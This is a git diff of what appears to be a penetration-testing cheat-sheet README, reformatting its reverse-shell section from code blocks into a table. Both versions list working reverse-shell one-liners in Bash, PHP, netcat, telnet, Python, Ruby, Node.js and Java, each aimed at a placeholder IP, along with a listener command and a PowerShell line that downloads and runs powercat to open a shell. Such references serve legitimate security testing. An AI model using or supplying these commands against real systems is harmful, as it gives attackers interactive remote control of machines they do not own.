diff --git a/README.md b/README.md index e074d35..f051bf0 100644 --- a/README.md +++ b/README.md @@ -281,57 +281,21 @@ function printit ($string) { ?> ``` - - * Listen Port -``` -ncat -vlnp 4444 -``` - - * Bash -``` -bash -i >& /dev/tcp/IP/4444 0>&1 -bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1' -``` - * PHP -``` -php -r '$sock=fsockopen("^IP^",5566);exec("/bin/sh -i <&3 >&3 2>&3");'` -``` - * NC -``` -nc -e /bin/sh ^IP^ 5566` -``` - * Telnet -``` -mknod backpipe p && telnet ^IP^ 5566 0backpipe` -``` - * Python -``` -python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` -``` - - * Ruby -``` -ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` -``` - - * Node.js -``` -var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); -``` -``` -require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/5566 0>&1'");` -``` - * Java -```Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();` -``` -``` -java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html -``` - - * Powershell -``` -powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd -``` +| Program | Command | +|----------|---------| +| Netcat Listen | ncat -vlnp 4444 | +| Bash | bash -i >& /dev/tcp/IP/4444 0>&1 | +| Bash | bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1' | +| PHP | php -r '$sock=fsockopen("^IP^",5566);exec("/bin/sh -i <&3 >&3 2>&3");'` | +| Netcat Connect | nc -e /bin/sh ^IP^ 5566`| +| Telnet | mknod backpipe p && telnet ^IP^ 5566 0backpipe` | +| Python | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` | +| Ruby | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` | +| Node.js | var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); | +| | require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/5566 0>&1'");` | +| Java | Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();` | +| Java | java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html | +| Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd | ### Spawning a Shell